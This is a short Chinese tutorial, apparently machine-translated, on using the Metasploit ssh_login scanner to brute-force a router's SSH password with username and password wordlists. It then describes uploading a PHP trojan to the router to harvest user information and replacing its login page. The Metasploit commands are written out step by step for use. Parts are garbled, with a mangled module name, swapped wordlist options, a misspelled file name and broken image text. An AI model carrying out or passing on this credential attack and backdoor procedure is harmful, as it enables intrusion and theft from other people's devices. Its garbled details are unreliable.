MSF控制台爆破ssh一:什么是ssh
Ssh是linux系统上的远程登录命令。 就像windows的远程桌面。 登录ssh后,可以进行与服务器相关的操作!
(2)端口扫描目标检测
1 )使用namp或netcat扫描网络时,发现我的路由器打开了ssh服务! [! [ (3359 img-blog.csdn img.cn/20200624021500762.pn在此插入图像说明) ]
(三) MSF控制台破解密码
1:MSF控制台运行
2 :加载模块
use auxiliary/scanner/ssh/ssh _ log in
3 :加载目标ip
Set rhosts 192.168.5.1
加载4:用户名
默认用户名为root
直接执行set username root即可,
如果默认用户名更改,则必须添加词典解密
Set pass_file pass.txx
下图是准备的用户名词典
设定为词典解读
5 :密码词典的设定
Set user_file user.txt
6 )开始解读
执行命令run
7:成功解密
用户名和密码分别是根和管理员
(四) ssh登录
登录成功
五:ssh能做什么
1 )可以在路由器上上传木马
将本地编写的shell木马上传到路由器以获取用户信息时
下图是为php写的木马
上传到路由器上了
Ok连接木马吧
2 :自定义路由器登录页面